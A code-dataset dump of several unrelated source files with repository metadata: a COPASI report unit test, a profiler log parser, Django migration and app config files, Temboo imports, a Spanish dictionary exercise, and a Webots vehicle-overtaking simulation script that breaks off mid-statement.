acff76f390954526a90aac1aec63ef3fb162fdac
| 2,652
|
py
|
Python
|
copasi/bindings/python/unittests/Test_CReport.py
|
bmoreau/COPASI
|
d0bbec8947b1266ffd2b0ecf2566da7cf2c3e5ba
|
[
"Artistic-2.0"
] | null | null | null |
copasi/bindings/python/unittests/Test_CReport.py
|
bmoreau/COPASI
|
d0bbec8947b1266ffd2b0ecf2566da7cf2c3e5ba
|
[
"Artistic-2.0"
] | null | null | null |
copasi/bindings/python/unittests/Test_CReport.py
|
bmoreau/COPASI
|
d0bbec8947b1266ffd2b0ecf2566da7cf2c3e5ba
|
[
"Artistic-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Begin CVS Header
# $Source: /Volumes/Home/Users/shoops/cvs/copasi_dev/copasi/bindings/python/unittests/Test_CReport.py,v $
# $Revision: 1.4 $
# $Name: $
# $Author: shoops $
# $Date: 2010/07/16 18:55:59 $
# End CVS Header
# Copyright (C) 2010 by Pedro Mendes, Virginia Tech Intellectual
# Properties, Inc., University of Heidelberg, and The University
# of Manchester.
# All rights reserved.
# Copyright (C) 2008 by Pedro Mendes, Virginia Tech Intellectual
# Properties, Inc., EML Research, gGmbH, University of Heidelberg,
# and The University of Manchester.
# All rights reserved.
import COPASI
import unittest
from types import *
class Test_CReport(unittest.TestCase):
def setUp(self):
self.datamodel=COPASI.CCopasiRootContainer.addDatamodel()
self.task=self.datamodel.getTask(0)
self.report=self.task.getReport()
def test_getReportDefinition(self):
reportDefinition=self.report.getReportDefinition()
self.assert_(reportDefinition!=None)
self.assert_(reportDefinition.__class__==COPASI.CReportDefinition)
def test_setReportDefinition(self):
listOfReportDefinitions=self.datamodel.getReportDefinitionList()
reportDefinition=listOfReportDefinitions.createReportDefinition("MyReportDefinition","No Comment")
self.assert_(reportDefinition!=None)
self.report.setReportDefinition(reportDefinition)
self.assert_(self.report.getReportDefinition().getKey()==reportDefinition.getKey())
def test_getTarget(self):
target=self.report.getTarget()
self.assert_(target!=None)
self.assert_(type(target)==StringType)
def test_setTarget(self):
target="MyTaget.txt"
self.report.setTarget(target)
t=self.report.getTarget()
self.assert_(t!=None)
self.assert_(t==target)
def test_append(self):
append=self.report.append()
self.assert_(type(append)==BooleanType)
def test_setAppend(self):
self.report.setAppend(True)
append=self.report.append()
self.assert_(append==True)
self.report.setAppend(False)
append=self.report.append()
self.assert_(append==False)
def suite():
tests=[
'test_getReportDefinition'
,'test_setReportDefinition'
,'test_getTarget'
,'test_setTarget'
,'test_append'
,'test_setAppend'
]
return unittest.TestSuite(map(Test_CReport,tests))
if(__name__ == '__main__'):
unittest.TextTestRunner(verbosity=2).run(suite())
| 30.482759
| 108
| 0.671192
|
acff7760ff28e7b3bb473de79b02838d74d337b8
| 219
|
py
|
Python
|
parse_log.py
|
rynecarbone/Pokerly
|
e1368eecab129ab0d94c3d043071c686111723a2
|
[
"MIT"
] | null | null | null |
parse_log.py
|
rynecarbone/Pokerly
|
e1368eecab129ab0d94c3d043071c686111723a2
|
[
"MIT"
] | null | null | null |
parse_log.py
|
rynecarbone/Pokerly
|
e1368eecab129ab0d94c3d043071c686111723a2
|
[
"MIT"
] | null | null | null |
import pstats
import sys
#o_file= sys.argv[1] if len(sys.argv)>1 else out.
#print(n_lines)
p = pstats.Stats('log_profile.txt')
#p.sort_stats('cumulative').print_stats(n_lines)
p.sort_stats('cumulative').print_stats()
| 21.9
| 49
| 0.748858
|
acff7781b62732c9342e5a905df44809cd514c07
| 770
|
py
|
Python
|
corehq/apps/notifications/migrations/0003_lastseennotification.py
|
dimagilg/commcare-hq
|
ea1786238eae556bb7f1cbd8d2460171af1b619c
|
[
"BSD-3-Clause"
] | 471
|
2015-01-10T02:55:01.000Z
|
2022-03-29T18:07:18.000Z
|
corehq/apps/notifications/migrations/0003_lastseennotification.py
|
dimagilg/commcare-hq
|
ea1786238eae556bb7f1cbd8d2460171af1b619c
|
[
"BSD-3-Clause"
] | 14,354
|
2015-01-01T07:38:23.000Z
|
2022-03-31T20:55:14.000Z
|
corehq/apps/notifications/migrations/0003_lastseennotification.py
|
dimagilg/commcare-hq
|
ea1786238eae556bb7f1cbd8d2460171af1b619c
|
[
"BSD-3-Clause"
] | 175
|
2015-01-06T07:16:47.000Z
|
2022-03-29T13:27:01.000Z
|
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('notifications', '0002_auto_20160505_2058'),
]
operations = [
migrations.CreateModel(
name='LastSeenNotification',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('last_seen_date', models.DateTimeField()),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, unique=True, on_delete=models.CASCADE)),
],
options={
},
bases=(models.Model,),
),
]
| 30.8
| 114
| 0.605195
|
acff7921ca77e56fd2039e7bd515b3170d0243fe
| 474
|
py
|
Python
|
temboo/core/Library/Amazon/Marketplace/Inventory/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Amazon/Marketplace/Inventory/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Amazon/Marketplace/Inventory/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Amazon.Marketplace.Inventory.ListInventorySupplyByDateRange import ListInventorySupplyByDateRange, ListInventorySupplyByDateRangeInputSet, ListInventorySupplyByDateRangeResultSet, ListInventorySupplyByDateRangeChoreographyExecution
from temboo.Library.Amazon.Marketplace.Inventory.ListInventorySupplyBySKU import ListInventorySupplyBySKU, ListInventorySupplyBySKUInputSet, ListInventorySupplyBySKUResultSet, ListInventorySupplyBySKUChoreographyExecution
| 158
| 251
| 0.936709
|
acff79385c85001e6e20f515caa2c531e36de760
| 158
|
py
|
Python
|
data_log_sheet/apps.py
|
antonnifo/DIT
|
7c496f37bab70229cd84c4b33332708ea8cf278b
|
[
"MIT"
] | null | null | null |
data_log_sheet/apps.py
|
antonnifo/DIT
|
7c496f37bab70229cd84c4b33332708ea8cf278b
|
[
"MIT"
] | null | null | null |
data_log_sheet/apps.py
|
antonnifo/DIT
|
7c496f37bab70229cd84c4b33332708ea8cf278b
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class DataLogSheetConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'data_log_sheet'
| 22.571429
| 56
| 0.778481
|
acff7995e100589dcf57ccfe139afe9f28637f59
| 558
|
py
|
Python
|
Ejercicios/Diccionario/Ejercicio2 Diccionario.py
|
Dharian/pythonProject
|
262d2b58d99befe668d29198bb28c98b75597a34
|
[
"MIT"
] | null | null | null |
Ejercicios/Diccionario/Ejercicio2 Diccionario.py
|
Dharian/pythonProject
|
262d2b58d99befe668d29198bb28c98b75597a34
|
[
"MIT"
] | null | null | null |
Ejercicios/Diccionario/Ejercicio2 Diccionario.py
|
Dharian/pythonProject
|
262d2b58d99befe668d29198bb28c98b75597a34
|
[
"MIT"
] | null | null | null |
def cargar_diccionario():
diccionario={}
for x in range(5):
nombre=str(input("Cual es el nombre del producto? "))
valor=int(input("Cual es el valor del producto? "))
diccionario[nombre]= valor
imprimir(diccionario)
imprimir_mayor100(diccionario)
def imprimir(diccionario):
print(diccionario)
print("diccionario completo impreso")
def imprimir_mayor100(diccionario):
for x in diccionario:
if diccionario[x] >= 100:
print(x,diccionario[x])
cargar_diccionario()
| 27.9
| 61
| 0.643369
|
acff79a23322dd48411f8682d31d40447da4575d
| 25,078
|
py
|
Python
|
src/scenarios/Overtaking/camera_agent_3.py
|
SahilDhull/autonomous
|
378fc7d6c5a9c34c4e915f080fb78ed5c11195d6
|
[
"MIT"
] | 3
|
2020-02-28T12:04:26.000Z
|
2022-02-27T00:42:56.000Z
|
src/scenarios/Overtaking/camera_agent_3.py
|
SahilDhull/autonomous
|
378fc7d6c5a9c34c4e915f080fb78ed5c11195d6
|
[
"MIT"
] | null | null | null |
src/scenarios/Overtaking/camera_agent_3.py
|
SahilDhull/autonomous
|
378fc7d6c5a9c34c4e915f080fb78ed5c11195d6
|
[
"MIT"
] | null | null | null |
import os
import sys
import math
import time
import csv
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + '/../../') # This is needed for the calls from Matlab
from Sim_ATAV.simulation_control.sim_data import SimData
from Sim_ATAV.simulation_control.webots_sensor import WebotsSensor
from Sim_ATAV.simulation_control.webots_fog import WebotsFog
from Sim_ATAV.simulation_control.webots_pedestrian import WebotsPedestrian
from Sim_ATAV.simulation_control.webots_vehicle import WebotsVehicle
from Sim_ATAV.simulation_control.webots_road import WebotsRoad
from Sim_ATAV.simulation_control.webots_road_disturbance import WebotsRoadDisturbance
from Sim_ATAV.simulation_control.heart_beat import HeartBeatConfig
from Sim_ATAV.simulation_control.item_description import ItemDescription
from Sim_ATAV.simulation_control.webots_controller_parameter import WebotsControllerParameter
from Sim_ATAV.simulation_control.webots_sim_object import WebotsSimObject
from Sim_ATAV.simulation_configurator import sim_config_tools
from Sim_ATAV.simulation_configurator.sim_environment import SimEnvironment
from Sim_ATAV.simulation_control.initial_state_config import InitialStateConfig
from Sim_ATAV.simulation_configurator.view_follow_config import ViewFollowConfig
from Sim_ATAV.simulation_configurator.sim_environment_configurator import SimEnvironmentConfigurator
from Sim_ATAV.simulation_configurator import covering_array_utilities
from Sim_ATAV.simulation_configurator import experiment_tools
# from path import *
# from grid import *
import numpy as np
import copy
import dubins
import shapely.geometry as geom
inf = 1e9
def RadiusofCurvature(start_pt, end_pt, turn_radius=20.0, step_size=1.0):
"""Generate points along a Dubins path connecting start point to end point.
Format for input / output points: (x, y, angle)"""
min_turn_radius = min(0.1, turn_radius)
satisfied = False
configurations = [start_pt, end_pt]
while not satisfied:
dubins_path = dubins.shortest_path(start_pt, end_pt, turn_radius)
configurations, _ = dubins_path.sample_many(step_size)
cex_found = False
for configuration in configurations:
if not (min(start_pt[0], end_pt[0]) - 0.1 <= configuration[0] <= max(start_pt[0], end_pt[0]) + 0.1 and
min(start_pt[1], end_pt[1]) - 0.1 <= configuration[1] <= max(start_pt[1], end_pt[1]) + 0.1):
cex_found = True
break
satisfied = not cex_found
if cex_found:
# Decrease radius until finding a satisfying result.
# We could do a binary search but that requires a termination condition.
turn_radius = turn_radius*0.9
if turn_radius < min_turn_radius:
break
if not satisfied:
return 0.1
return turn_radius
def cost(c1, pt1,pt2, off=0.0):
r = RadiusofCurvature(pt1,pt2)
return c1 + math.sqrt((pt2[0]-pt1[0])**2 + (pt2[1]-pt1[1])**2) + 10.0/r + 10.0*abs(off)
def computeTargetPath():
grid_points = []
x1 = 500.0
x2 = 0
y1 = 0.0
y2 = -40.0
w = 3.6
x_step = 5.0
y_step = 0.4
r_curv = 20.0
x_ctr1 = 0.0
y_ctr1 = -20.0
x_ctr2 = 500.0
y_ctr2 = -20.0
st = math.floor((math.pi*r_curv)/x_step) # steps to take in the curved part
# 1st part
for i in np.arange(x1,x2,-x_step):
gp = []
for j in np.arange(y1+w,y1-w,-y_step):
gp.append([i,y1+round(j,2),math.pi])
grid_points.append(gp)
# 2nd part
for i in range(st):
gp = []
theta = i*x_step/r_curv
x_cur = x_ctr1 - r_curv*math.sin(theta)
y_cur = y_ctr1 + r_curv*math.cos(theta)
for j in np.arange(y1+w,y1-w,-y_step):
gp.append([round(x_cur+j*math.sin(theta),2),round(y_cur-j*math.cos(theta),2),math.pi+theta])
grid_points.append(gp)
# 3rd part
for i in np.arange(x2,x1,x_step):
gp = []
for j in np.arange(y1+w,y1-w,-y_step):
gp.append([i,y2+round(j,2),0.0])
grid_points.append(gp)
# 4th part
for i in range(st):
gp = []
theta = i*x_step/r_curv
x_cur = x_ctr2 + r_curv*math.sin(theta)
y_cur = y_ctr2 - r_curv*math.cos(theta)
for j in np.arange(y1+w,y1-w,-y_step):
gp.append([round(x_cur+j*math.sin(theta),2),round(y_cur-j*math.cos(theta),2),theta])
grid_points.append(gp)
#-----------Solve the circularity problem with theta------------------------
# print(grid_points[0][9])
travel_path = []
total_steps = 1000
p = []
c = []
X = round(2*w/y_step)
Y = len(grid_points)
for j in range(Y):
k = []
f = []
for i in range(X):
k.append(inf)
f.append((-1,-1))
c.append(k)
p.append(f)
c[0][9] = 0.0
for i in range(Y-1):
for j in range(X):
m1 = max(0,j-3)
m2 = min(X-1,j+3)
for k in range(m1,m2+1):
cur_cost = 0;
cur_cost = cost(c[i][j],grid_points[i][j],grid_points[i+1][k],abs(k-9)*0.4)
if(c[i+1][k] > cur_cost):
c[i+1][k] = cur_cost
p[i+1][k] = (i,j)
i= Y-1
j = 9
# print(type(grid_points[0][0][0]))
while(p[i][j]!=(-1,-1)):
travel_path = [[float(grid_points[i][j][0]),float(grid_points[i][j][1])]] + travel_path
(i,j) = p[i][j]
return travel_path
def run_test(ego_init_speed_m_s=10.0, ego_x_pos=20.0, pedestrian_speed=3.0, sim_duration=24000, for_matlab=False):
"""Runs a test with the given arguments"""
sim_environment = SimEnvironment()
# --- Add road
# road = WebotsRoad(number_of_lanes=3)
# road.rotation = [0, 1, 0, -math.pi / 2]
# road.position = [500, 0.02, 0]
# road.length = 500.0
# sim_environment.road_list.append(road)
# ----- Define VEHICLES:
# Ego vehicle
vhc_obj = WebotsVehicle()
vhc_obj.current_position = [500.0, 0.35, 0.0]
vhc_obj.current_orientation = math.pi/2
vhc_obj.rotation = [0.0, 1.0, 0.0, vhc_obj.current_orientation]
vhc_obj.current_orientation = -math.pi/2.0
vhc_obj.rotation = [0.0, 1.0, 0.0, -math.pi/2.0]
vhc_obj.vhc_id = 1
vhc_obj.color = [1.0, 0.0, 0.0]
vhc_obj.set_vehicle_model('TeslaModel3')
vhc_obj.controller = 'automated_driving_with_fusion2'
vhc_obj.is_controller_name_absolute = True
vhc_obj.controller_arguments.append('Toyota')
vhc_obj.controller_arguments.append('70.0')
vhc_obj.controller_arguments.append('0.0')
vhc_obj.controller_arguments.append('1')
vhc_obj.controller_arguments.append('True')
vhc_obj.controller_arguments.append('False')
vhc_obj.controller_arguments.append('0')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'Receiver'
vhc_obj.sensor_array[-1].add_sensor_field('name', '"receiver"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'Compass'
vhc_obj.sensor_array[-1].add_sensor_field('name', '"compass"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'GPS'
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_type = 'Radar' # 'Radar' #'DelphiESR'
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.FRONT
vhc_obj.sensor_array[-1].add_sensor_field('name', '"radar"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_type = 'Camera' # 'Radar' #'DelphiESR'
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.TOP
vhc_obj.sensor_array[-1].add_sensor_field('name', '"camera"')
# sim_environment.ego_vehicles_list.append(vhc_obj)
#############################################
vhc_obj = WebotsVehicle()
vhc_obj.current_position = [200.0, 0.35, 0.0]
vhc_obj.current_orientation = 0.0
vhc_obj.rotation = [0.0, 1.0, 0.0, -math.pi/2]
vhc_obj.vhc_id = 1
vhc_obj.set_vehicle_model('TeslaModel3')
vhc_obj.color = [1.0, 0.0, 0.0]
vhc_obj.controller = 'automated_driving_with_fusion2'
vhc_obj.controller_arguments.append('25.0')
vhc_obj.controller_arguments.append('True')
vhc_obj.controller_arguments.append('3.5')
vhc_obj.controller_arguments.append('1')
vhc_obj.controller_arguments.append('False')
vhc_obj.controller_arguments.append('False')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'Receiver'
vhc_obj.sensor_array[-1].add_sensor_field('name', '"receiver"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'Compass'
vhc_obj.sensor_array[-1].add_sensor_field('name', '"compass"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'GPS'
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_type = 'Camera' # 'Radar' #'DelphiESR'
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.TOP
vhc_obj.sensor_array[-1].add_sensor_field('name', '"camera"')
# sim_environment.ego_vehicles_list.append(vhc_obj)
# sim_environment.agent_vehicles_list.append(vhc_obj)
# ----- Agent vehicles
# Agent:
vhc_obj = WebotsVehicle()
vhc_obj.current_position = [420.0, 0.35, 0.0]
vhc_obj.current_orientation = 0.0
vhc_obj.rotation = [0.0, 1.0, 0.0, -math.pi/2]
vhc_obj.vhc_id = 2
vhc_obj.set_vehicle_model('TeslaModel3')
vhc_obj.color = [1.0, 0.0, 0.0]
vhc_obj.controller = 'path_and_speed_follower'
vhc_obj.controller_arguments.append('25.0')
vhc_obj.controller_arguments.append('True')
vhc_obj.controller_arguments.append('3.5')
vhc_obj.controller_arguments.append('2')#vhc_id
vhc_obj.controller_arguments.append('False')
vhc_obj.controller_arguments.append('False')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'Receiver'
vhc_obj.sensor_array[-1].add_sensor_field('name', '"receiver"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'Compass'
vhc_obj.sensor_array[-1].add_sensor_field('name', '"compass"')
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.CENTER
vhc_obj.sensor_array[-1].sensor_type = 'GPS'
vhc_obj.sensor_array.append(WebotsSensor())
vhc_obj.sensor_array[-1].sensor_type = 'Radar' # 'Radar' #'DelphiESR'
vhc_obj.sensor_array[-1].sensor_location = WebotsSensor.FRONT
vhc_obj.sensor_array[-1].add_sensor_field('name', '"radar"')
sim_environment.agent_vehicles_list.append(vhc_obj)
# ----- Define PEDESTRIANS:
# Pedestrian 1
# pedestrian = WebotsPedestrian()
# pedestrian.ped_id = 1
# pedestrian.current_position = [50.0, 1.3, 0.0]
# pedestrian.shirt_color = [0.0, 0.0, 0.0]
# pedestrian.pants_color = [0.0, 0.0, 1.0]
# pedestrian.target_speed = pedestrian_speed
# pedestrian.trajectory = [50.0, 0.0, 80.0, -3.0, 200.0, 0.0]
# pedestrian.controller = 'pedestrian_control'
# sim_environment.pedestrians_list.append(pedestrian)
# ----- Fog:
# sim_environment.fog = WebotsFog()
# sim_environment.fog.visibility_range = 700.0
# ----- Road Disturbances:
# road_disturbance = WebotsRoadDisturbance()
# road_disturbance.disturbance_type = WebotsRoadDisturbance.TRIANGLE_DOUBLE_SIDED
# road_disturbance.rotation = [0, 1, 0, -math.pi / 2.0]
# road_disturbance.position = [40, 0, 0]
# road_disturbance.width = 3.5
# road_disturbance.length = 3
# road_disturbance.height = 0.04
# road_disturbance.inter_object_spacing = 0.5
# sim_environment.road_disturbances_list.append(road_disturbance)
# ----- Stop sign:
# sim_obj = WebotsSimObject()
# sim_obj.object_name = 'StopSign'
# sim_obj.object_parameters.append(('translation', '40 0 6'))
# sim_obj.object_parameters.append(('rotation', '0 1 0 1.5708'))
# sim_environment.generic_sim_objects_list.append(sim_obj)
# ----- Initial State Configurations:
sim_environment.initial_state_config_list.append(
InitialStateConfig(item=ItemDescription(item_type=ItemDescription.ITEM_TYPE_VEHICLE,
item_index=0,
item_state_index=WebotsVehicle.STATE_ID_VELOCITY_X),
value=ego_init_speed_m_s))
# ----- Controller Parameters:
# Ego Target Path:
target_pos_list = [[450.0, 0.0],
[-400.0, 0.0]]
# target_pos_list = [[450.0, 0.0], [445.0, 0.0], [440.0, 0.0], [435.0, 0.0], [430.0, 0.0], [425.0, 0.0], [420.0, 0.0], [415.0, 0.0], [410.0, 0.0], [405.0, 0.0], [400.0, 0.9], [395.0, 3.6], [390.0, 3.6], [385.0, 3.6], [380.0, 0.9], [375.0, 0.0], [370.0, 0.0], [365.0, 0.0], [360.0, 0.0], [355.0, 0.0], [350.0, 0.0], [345.0, 0.0], [340.0, 0.0], [335.0, 0.0], [330.0, 0.0], [325.0, 0.0], [320.0, 0.0], [315.0, 0.0], [310.0, 0.0], [305.0, 0.0], [300.0, 0.0], [295.0, 0.0], [290.0, 0.0], [285.0, 0.0], [280.0, 0.0], [275.0, 0.0], [270.0, 0.0], [265.0, 0.0], [260.0, 0.0], [255.0, 0.0], [250.0, 0.0], [245.0, 0.0], [240.0, 0.0], [235.0, 0.0], [230.0, 0.0], [225.0, 0.0], [220.0, 0.0], [215.0, 0.0], [210.0, 0.0], [205.0, 0.0], [200.0, 0.0], [195.0, 0.0], [190.0, 0.0], [185.0, 0.0], [180.0, 0.0], [175.0, 0.0], [170.0, 0.0], [165.0, 0.0], [160.0, 0.0], [155.0, 0.0], [150.0, 0.0], [145.0, 0.0], [140.0, 0.0], [135.0, 0.0], [130.0, 0.0], [125.0, 0.0], [120.0, 0.0], [115.0, 0.0], [110.0, 0.0], [105.0, 0.0], [100.0, 0.0], [95.0, 0.0], [90.0, 0.0], [85.0, 0.0], [80.0, 0.0], [75.0, 0.0], [70.0, 0.0], [65.0, 0.0], [60.0, 0.0], [55.0, 0.0], [50.0, 0.0], [45.0, 0.0], [40.0, 0.0], [35.0, 0.0], [30.0, 0.0], [25.0, 0.0], [20.0, 0.0], [15.0, 0.0], [10.0, 0.0], [5.0, 0.0], [-0.0, 0.0], [-4.95, -0.62], [-9.59, -2.45], [-13.63, -5.37], [-16.83, -9.19], [-18.98, -13.69], [-19.95, -18.59], [-19.68, -23.56], [-18.19, -28.32], [-15.56, -32.56], [-11.97, -36.02], [-7.63, -38.49], [-2.82, -39.8], [0.0, -40.0], [5.0, -40.0], [10.0, -40.0], [15.0, -40.0], [20.0, -40.0], [25.0, -40.0], [30.0, -40.0], [35.0, -40.0], [40.0, -40.0], [45.0, -40.0], [50.0, -40.0], [55.0, -40.0], [60.0, -40.0], [65.0, -40.0], [70.0, -40.0], [75.0, -40.0], [80.0, -40.0], [85.0, -40.0], [90.0, -40.0], [95.0, -40.0], [100.0, -40.0], [105.0, -40.0], [110.0, -40.0], [115.0, -40.0], [120.0, -40.0], [125.0, -40.0], [130.0, -40.0], [135.0, -40.0], [140.0, -40.0], [145.0, -40.0], [150.0, -40.0], [155.0, -40.0], [160.0, -40.0], [165.0, 
-40.0], [170.0, -40.0], [175.0, -40.0], [180.0, -40.0], [185.0, -40.0], [190.0, -40.0], [195.0, -40.0], [200.0, -40.0], [205.0, -40.0], [210.0, -40.0], [215.0, -40.0], [220.0, -40.0], [225.0, -40.0], [230.0, -40.0], [235.0, -40.0], [240.0, -40.0], [245.0, -40.0], [250.0, -40.0], [255.0, -40.0], [260.0, -40.0], [265.0, -40.0], [270.0, -40.0], [275.0, -40.0], [280.0, -40.0], [285.0, -40.0], [290.0, -40.0], [295.0, -40.0], [300.0, -40.0], [305.0, -40.0], [310.0, -40.0], [315.0, -40.0], [320.0, -40.0], [325.0, -40.0], [330.0, -40.0], [335.0, -40.0], [340.0, -40.0], [345.0, -40.0], [350.0, -40.0], [355.0, -40.0], [360.0, -40.0], [365.0, -40.0], [370.0, -40.0], [375.0, -40.0], [380.0, -40.0], [385.0, -40.0], [390.0, -40.0], [395.0, -40.0], [400.0, -40.0], [405.0, -40.0], [410.0, -40.0], [415.0, -40.0], [420.0, -40.0], [425.0, -40.0], [430.0, -40.0], [435.0, -40.0], [440.0, -40.0], [445.0, -40.0], [450.0, -40.0], [455.0, -40.0], [460.0, -40.0], [465.0, -40.0], [470.0, -40.0], [475.0, -40.0], [480.0, -40.0], [485.0, -40.0], [490.0, -40.0], [495.0, -40.0], [500.0, -40.0], [504.95, -39.38], [509.59, -37.55], [513.63, -34.63], [516.83, -30.81], [518.98, -26.31], [519.95, -21.41], [519.68, -16.44], [518.19, -11.68], [515.56, -7.44], [511.97, -3.98], [507.63, -1.51], [502.82, -0.2], [500.0, 0.0], [495.0, 0.0], [490.0, 0.0], [485.0, 0.0], [480.0, 0.0], [475.0, 0.0], [470.0, 0.0], [465.0, 0.0], [460.0, 0.0], [455.0, 0.0], [450.0, 0.0], [445.0, 0.0], [440.0, 0.0], [435.0, 0.0], [430.0, 0.0], [425.0, 0.0], [420.0, 0.0], [415.0, 0.0], [410.0, 0.0], [405.0, 0.0], [400.0, 0.0], [395.0, 0.0], [390.0, 0.0], [385.0, 0.0], [380.0, 0.0], [375.0, 0.0], [370.0, 0.0], [365.0, 0.0], [360.0, 0.0], [355.0, 0.0], [350.0, 0.0], [345.0, 0.0], [340.0, 0.0], [335.0, 0.0], [330.0, 0.0], [325.0, 0.0], [320.0, 0.0], [315.0, 0.0], [310.0, 0.0], [305.0, 0.0], [300.0, 0.0], [295.0, 0.0], [290.0, 0.0], [285.0, 0.0], [280.0, 0.0], [275.0, 0.0], [270.0, 0.0], [265.0, 0.0], [260.0, 0.0], [255.0, 0.0], [250.0, 
0.0], [245.0, 0.0], [240.0, 0.0], [235.0, 0.0], [230.0, 0.0], [225.0, 0.9], [220.0, 3.6], [215.0, 3.6], [210.0, 0.9], [205.0, 0.0], [200.0, 0.0], [195.0, 0.0], [190.0, 0.0], [185.0, 0.0], [180.0, 0.0], [175.0, 0.0], [170.0, 0.0]]
for target_pos in target_pos_list:
sim_environment.controller_params_list.append(
WebotsControllerParameter(vehicle_id=2,
parameter_name='target_position',
parameter_data=target_pos))
# target_pos_list = computeTargetPath()
target_pos_list = [[520.0, 0.0] ,[500.0, 0.0], [495.0, 0.0], [490.0, 0.0], [485.0, 0.0], [480.0, 0.0], [475.0, 0.0], [470.0, 0.0], [465.0, 0.0], [460.0, 0.0], [455.0, 0.0], [450.0, 0.0], [445.0, 0.0], [440.0, 0.0], [435.0, 0.0], [430.0, 0.4], [425.0, 0.8], [420.0, 1.2], [415.0, 1.6], [410.0, 2.0], [405.0, 2.4], [400.0, 2.4], [395.0, 2.4], [390.0, 2.4], [385.0, 2.4], [380.0, 2.4], [375.0, 2.4], [370.0, 2.4], [365.0, 2.4], [360.0, 2.0], [355.0, 1.6], [350.0, 1.2], [345.0, 0.8], [340.0, 0.4], [335.0, 0.0], [330.0, 0.0], [325.0, 0.0], [320.0, 0.0], [315.0, 0.0], [310.0, 0.0], [305.0, 0.0], [300.0, 0.0], [295.0, 0.0], [290.0, 0.0], [285.0, 0.0], [280.0, 0.0], [275.0, 0.0], [270.0, 0.0], [265.0, 0.0], [260.0, 0.0], [255.0, 0.0], [250.0, 0.0], [245.0, 0.0], [240.0, 0.0], [235.0, 0.0], [230.0, 0.0], [225.0, 0.0], [220.0, 0.0], [215.0, 0.0], [210.0, 0.0], [205.0, 0.0], [200.0, 0.0], [195.0, 0.0], [190.0, 0.0], [185.0, 0.0], [180.0, 0.0], [175.0, 0.0], [170.0, 0.0], [165.0, 0.0], [160.0, 0.0], [155.0, 0.0], [150.0, 0.0], [145.0, 0.0], [140.0, 0.0], [135.0, 0.0], [130.0, 0.0], [125.0, 0.0], [120.0, 0.0], [115.0, 0.0], [110.0, 0.0], [105.0, 0.0]]
for target_pos in target_pos_list:
sim_environment.controller_params_list.append(
WebotsControllerParameter(vehicle_id=1,
parameter_name='target_position',
parameter_data=target_pos))
# ----- Heart Beat Configuration:
sim_environment.heart_beat_config = HeartBeatConfig(sync_type=HeartBeatConfig.WITHOUT_SYNC,
period_ms=2000)
# ----- View Follow configuration:
sim_environment.view_follow_config = \
ViewFollowConfig(item_type=ItemDescription.ITEM_TYPE_VEHICLE,
item_index=0,
# position=[sim_environment.agent_vehicles_list[0].current_position[0] + 15.0,
# sim_environment.agent_vehicles_list[0].current_position[1] + 2.0,
# sim_environment.agent_vehicles_list[0].current_position[2]],
position=[515.0, 2.35, 0.0],
rotation=[0.0, -1.0, 0.0, -math.pi/2.0])
# ----- Data Log Configurations:
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_TIME, item_index=0, item_state_index=0))
for vhc_ind in range(len(sim_environment.ego_vehicles_list) + len(sim_environment.agent_vehicles_list)):
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_VEHICLE,
item_index=vhc_ind,
item_state_index=WebotsVehicle.STATE_ID_POSITION_X))
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_VEHICLE,
item_index=vhc_ind,
item_state_index=WebotsVehicle.STATE_ID_POSITION_Y))
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_VEHICLE,
item_index=vhc_ind,
item_state_index=WebotsVehicle.STATE_ID_ORIENTATION))
sim_environment.data_log_description_list.append(
